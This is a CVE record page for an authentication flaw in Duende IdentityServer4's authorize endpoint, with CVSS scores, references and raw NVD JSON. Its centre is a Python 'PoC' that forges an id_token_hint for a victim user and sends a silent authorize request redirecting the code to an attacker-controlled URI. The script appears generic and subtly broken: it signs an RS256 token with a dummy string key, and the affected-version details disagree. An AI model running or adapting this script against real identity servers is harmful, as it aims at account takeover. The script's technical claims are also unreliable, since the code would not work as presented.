CVE-2026-4349

Description

A vulnerability was determined in Duende IdentityServer4 up to 4.1.2. The affected element is an unknown function of the file /connect/authorize of the component Token Renewal Endpoint. This manipulation of the argument id_token_hint causes improper authentication. It is possible to initiate the attack remotely. The attack is considered to have high complexity. The exploitability is described as difficult. This vulnerability only affects products that are no longer supported by the maintainer.

CVSS Details

CVSS Score

5.6

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Duende IdentityServer4 < 4.1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-4349 PoC - Duende IdentityServer4 Authentication Bypass
# Target: Duende IdentityServer4 <= 4.1.2
# Endpoint: /connect/authorize
# Attack Vector: Manipulating id_token_hint parameter

import requests
import jwt
from urllib.parse import urlencode

# Configuration
TARGET_URL = "https://vulnerable-server/connect/authorize"
CLIENT_ID = "your-client-id"
REDIRECT_URI = "https://attacker-controlled-uri/callback"
SCOPE = "openid profile"

# Generate a forged id_token_hint (requires understanding target's signing key)
def generate_forged_token_hint():
    """
    Generate a forged id_token_hint to bypass authentication.
    In real attack scenario, attacker needs to obtain or guess the signing key.
    """
    header = {
        "alg": "RS256",
        "typ": "JWT"
    }
    payload = {
        "iss": "https://vulnerable-server",
        "sub": "victim-user-id",
        "aud": CLIENT_ID,
        "exp": 9999999999,
        "iat": 1700000000,
        "nonce": "attacker-controlled-nonce"
    }
    # Note: This requires the actual signing key or a key confusion attack
    forged_token = jwt.encode(payload, "dummy-key", algorithm="RS256")
    return forged_token

# Construct the attack request
def exploit_auth_bypass():
    token_hint = generate_forged_token_hint()
    
    params = {
        "response_type": "code",
        "client_id": CLIENT_ID,
        "redirect_uri": REDIRECT_URI,
        "scope": SCOPE,
        "state": "random-state-value",
        "response_mode": "query",
        "id_token_hint": token_hint,
        "prompt": "none"
    }
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Accept": "text/html,application/xhtml+xml"
    }
    
    print(f"[*] Sending malicious request to {TARGET_URL}")
    print(f"[*] Using forged id_token_hint: {token_hint[:50]}...")
    
    response = requests.get(TARGET_URL, params=params, headers=headers, allow_redirects=False)
    
    print(f"[*] Response Status: {response.status_code}")
    print(f"[*] Response Headers: {dict(response.headers)}")
    
    if response.status_code == 302:
        location = response.headers.get('Location', '')
        if 'code=' in location or 'id_token=' in location:
            print("[!] Authentication bypass potentially successful!")
            print(f"[!] Redirect location: {location}")
            return True
    
    print("[*] Attack completed, analyze response for exploitation results")
    return False

if __name__ == "__main__":
    exploit_auth_bypass()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4349
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4349
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4349/
[4] VulDB https://vuldb.com/cve/CVE-2026-4349
[5] https://vuldb.com/?ctiid.351380
[6] https://vuldb.com/?id.351380
[7] https://vuldb.com/?submit.772071

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4349", "sourceIdentifier": "[email protected]", "published": "2026-03-17T22:16:15.407", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Duende IdentityServer4 up to 4.1.2. The affected element is an unknown function of the file /connect/authorize of the component Token Renewal Endpoint. This manipulation of the argument id_token_hint causes improper authentication. It is possible to initiate the attack remotely. The attack is considered to have high complexity. The exploitability is described as difficult. This vulnerability only affects products that are no longer supported by the maintainer."}, {"lang": "es", "value": "Se determinó una vulnerabilidad en Duende IdentityServer 4. El elemento afectado es una función desconocida del archivo /connect/authorize del componente Token Renewal Endpoint. Esta manipulación del argumento id_token_hint causa una autenticación impropia. Es posible iniciar el ataque de forma remota. El ataque se considera de alta complejidad. La explotabilidad se describe como difícil. El proveedor fue contactado tempranamente sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "baseScore": 5.1, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 4.9, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://vuldb.com/?ctiid.351380", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351380", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.772071", "source": "[email protected]"}]}}